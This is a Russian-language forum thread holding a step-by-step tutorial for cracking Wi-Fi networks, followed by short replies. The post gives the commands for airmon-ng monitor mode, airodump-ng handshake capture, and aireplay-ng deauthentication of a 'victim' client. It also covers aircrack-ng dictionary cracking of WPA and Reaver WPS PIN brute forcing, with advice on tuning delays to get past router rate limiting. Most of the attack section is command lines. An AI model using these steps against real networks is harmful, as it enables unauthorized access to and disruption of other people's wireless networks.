Загрузка...

crack wifi. Not in 1 click.

Thread in WiFi created by Interview Dec 8, 2018. 589 views

  1. Interview
    Interview Topic starter Dec 8, 2018 Banned 46 Dec 8, 2018
    Всем привет, Сегодня хорошее настроение, хороший день. 08.12.2018 идёт снег вё супер. А так же я допечён вопросами про взлом wi-fi / Я думал все уже умеют, все знают, тем про это много. Хотя ещё год или два назад. я и сам не умел , искал информацию в гугле, где только можно. Очень не хватала мануалов. Да не, простоя нуб и не понимал что к чему.
    И так ближе к делу. Будем ломать wi-fi - можно соседа , но тогда полный мануал не получиться, поэтому будем ломать мой собственный. Ха-Ха, по ходу видео вы спросить, а чего его ломать, он же твой, Да и её нету пароля. У меня открытая точка доступа Ибо я не жадный
    И так поехали.
    Первое что на надо это wi-fi адаптер нужный, я же себе взял wifi alfa awus036h ALFA У меня китай . Ну ничего страшного , всё дело в чипе.
    Посмотрите в интернете подходит ваша карта для этого дела. Ну с этим разобрались.
    Второе. Нужен линукс, я использую backtrack 5R3 вернее использовал, теперь kali . Я вас уверяю подойдёт любой линукс. Под виной я не буру рассматривать варианты. Они идентичны. за неким исключением.
    И так всё у нас готово , кара , линукс. начнём с первой команды

    ifconfig - это покажет интерфейс (название нашей карты)
    [IMG]


    теперь вторая команда
    airmon-ng start wlan0
    Это переведёт карту в режим мониторинга , и создаст новый виртуальный интерфейс , mon1 с которым и будем работать.
    [IMG]


    Всё, теперь всё приготовили к бою, переходим к активным действиям. начинаем сканировать эфир(точки доступные)

    команда airodump-ng mon1

    [IMG]

    тут я отметил важную информацию

    разберёмся по картинки

    1- это канал который в данный момент сканируется
    2- это мак адрес точки, роутера. Жертвы
    3-это метод защиты
    4- название точки доступа
    Вот там ещё есть под пункты
    если 2 это мак точки доступа, то 2.1 это мак того человека который подключён к ней
    2.1 мак клиента
    1.1 канал на которым работает точка

    Вроде всё.
    Теперь , выбираем жертву из ходя от метода атаки. Начнём с самого сложного.
    и так нам надо сканировать одну точку а не все , делаем

    airodump-ng --bssid 740:2B:44:AA:CC -c 6 mon1
    Где --bssid мак точки -с канал на которым она работает
    [IMG]

    -1- это мак точки
    -2- мак клиента, то есть мой
    -3- это активность, можно сказать пакеты.
    и так поскольку она у меня открыта её ломать нечего , поэтому я сейчас поставлю пароль и продолжим

    Об этом чуть позже фото и видео


    Уязвимость этого метода защиты (шифрования) заключается в том что при достаточном количестве пакетов можно получить пароль. Хакер сниферит эти пакеты и и отправляет в программу которая дешифрует и выдаст пароли.
    Фух, роутер меня подводит, рассмотриv wep в другой раз.Тем более это уже почти археологическая находка

    Перейдём в wpa/wp2



    что тут сказать, ту два метода , рассмотрим старый.
    эту атаку можно поделить на две части.
    первая перехват хэндшейха (рукопожатие)
    или момент когда клиент присоединяется к точки, проще сказать момент авторизации клиента
    И второй это дешифровка пароля, собственно начнём
    имеем пароль мега сложный , я всё таки защитил себя паролем
    [IMG]


    и так поехали .
    перехватываем нужные пакеты
    команда

    airodump-ng --bssid 740:2B:44:AA:CC -c 6 mon1 -w txt.txt
    так всё знакомые команды, кроме одной

    -w txt.txt -w запись файла. название и расширение

    [IMG]


    там где стрелками должно быть handshake . она была, но очень быстро скрылась , однако своё грязное дело я сделал....



    Упс . Долго ждать момент авторизации, что ж делать, не ждать же вечность .
    На это случай ещё кое что есть , мы просто выгоним его и всё, и ему опять придётся водить пароль да и просто авторизоваться
    +------------------------------------------------------------------------------------------------------------
    +
    + aireplay-ng -0 9999 -a 10:BF:48:B1:F2:C8 -c 84:A4:663:E0C mon0
    + Где
    + aireplay-ng <- программа -0 послать пакет (deauthenticate 1 or all stations (-0)
    + 9999 число пакетов которые посылаем -a точка доступа -с мак того кого будем +скидывать(жертвы)
    +------------------------------------------------------------------------------------------------------------
    теперь мы имеем дамп с нужным пакетом, надо вытащить пароль , однако есть один метод это сделать . это ****ить , для этого нужен словарь где должен быть этот пароль.
    (вот по этому этот метод взлома плохой и им никогда не ломал )

    и так мы скачали много словарей ТБ на 300 . теперь можно легко ****ить , я тоже приготовил словарик, и нужный пароль находиться на 1014 строчки посмотрим что будет

    Кстати, когда мы сниферили создались 4 файлика с расширениям cap csv kismet.csv и kismet.netxml нам нужен cap

    теперь новая команда
    aircrack-ng -a2 /root/txt.txt-02.cap -w '/root/Desktop/pass.txt'
    aircrack-ng <- программа -a2 <- говорим что ломать - это говорим ломать
    /root/txt.txt-02.cap <- путь к нашему дампу -w '/root/Desktop/pass.txt' <-путь к словарю


    aircrack-ng -a2 путь к дамку с рукопожатием -w словарь

    результат будет таким
    [IMG]


    так а если больше паролей
    в 4 раза , сколько время займёт ?
    давайте посмотрим
    16900 паролей
    тоже находит, но дольше

    и так всё покончим с этим , теперь метод которым я и ломаю

    для этого нам понадобиться минимум усилий
    уязвимость заключается в протоколе WPS
    можем подбирать пины , и когда подберём точка отдаст нам пароль ))

    Список чипов подходящие поддерживаемые reaver
    Полностью
    ath9k
    rtl8187
    carl19170
    ipw2000
    rt2800pci
    rt73usb

    частично

    ath5k
    iwlagn
    b43

    Не поддерживаются

    iwl4965
    RT3070L
    Netgear WG111v3

    Действия
    Узнаём у каких точек включенная опция WPS
    wash -i mon1
    [IMG]

    и так то что в красном круге вы уже знайте
    -1- версия wps
    -2- wps открыт
    -3- wps закрыт

    нам нужны те что открыты
    поэтому берём любой И

    reaver -i mon0 -b 740:2B:44:AA:CC -c 6 -vv
    reaver <-программа -b mac точки -c канал -vv показывать детали


    [IMG]


    тут пожалуй без комментов.

    Очень часта проблема это
    WARNING: Detected AP rate limiting, waiting 60 когда точка блокируется . Но об этом завтра
    Устал я однако п.с выложу видео действий по этой статье.

    P.S Я вам наврал про первую команду . ВСЕГДА ПЕРВОЙ КОМАНДОЙ ДОЛЖНА БЫТЬ -h or --h or -** or -help and help

    Видео Опа

    И так продолжение.
    При атаке reaver-ом не редко точка уходит в блок что же делать ? Спокойно Метод проб и ошибок никто не отменят. Я не рассматриваю Дос точки и прочей хрени. поэтому делаем всё на много проще

    И так после 10-14 попыток точка уходит в блок от 60-260-до бесконечности секунд.
    WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    Борьба:



    набираем команду reaver видим мануал, нам интересны


    -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
    -d, --delay=<seconds> Set the delay between pin attempts [1]
    -t, --timeout=<seconds> Set the receive timeout period [5]
    Собственно я просто подумал как они так уходят в блок, вспомнил про систему ids/ ipsec.
    Так вот что касается метода проб и ошибок , нам надо задать значение -d такое что бы обойти не дуг , советую начинать с сотни, можно с 50 и по степенно уменьшать это значения . Но стоит раз промахнуться и точка может навсегда уйти в блок . Собственно в этом весь прикол. -Т тоже тогда надо увеличить , так что-бы точно быть уверенным что всё а ажуре))
    п.с когда спасает -т , а бывает не редко -d пробуйте.
    Ну и заключение

    установка в kali linux reaver 1.5
    1) - apt-get install libpcap-dev
    2) - apt-get install libsqlite3-dev
    3) - svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ reaver-wps-fork-read-onl
    4) - cd reaver-wps-fork-read-only/src
    5) - ./configure
    6) - make distclean && ./configure
    7) - sudo make
    8) - sudo make install
    9) Запускаем reaver 1.5
    10) Крушим беспроводную сеть !

    Писал статью в два подхода , сбивался с мыслями, если у кого-то что-то есть пишите, исправим, отредактируем . Любая критика на УРА
     
  2. KoldunTolik
    KoldunTolik Dec 8, 2018 Banned 53 Sep 6, 2018
    Ух сука сложноо
     
  3. Interview
    Interview Topic starter Dec 8, 2018 Banned 46 Dec 8, 2018
    Не пойдет для тех, кто хочет все делать, нажав только 1 кнопочку.
     
  4. Pezdos91
    Pezdos91 Dec 8, 2018 Banned 17 Apr 2, 2018
    спасибо за статью, которую 100500 раз видел каждый обитатель форума.
     
  5. perech
    perech Dec 8, 2018 Banned 592 Aug 12, 2017
    ТУПЫЕ БУКАВЫ! ЛУЧШЕ КАРТИНКИ СМАТРЕТЬ ЧЕМ ЭТИ БУКАВЫ ЧИТАТЬ! :roflanBuldiga::roflanBuldiga::roflanBuldiga:
     
  6. KoldunTolik
    KoldunTolik Dec 8, 2018 Banned 53 Sep 6, 2018
    И то правда
     
  7. KoldunTolik
    KoldunTolik Dec 8, 2018 Banned 53 Sep 6, 2018
    perech Прикольная ава с бесконечной печенькой
     
Loading...
Top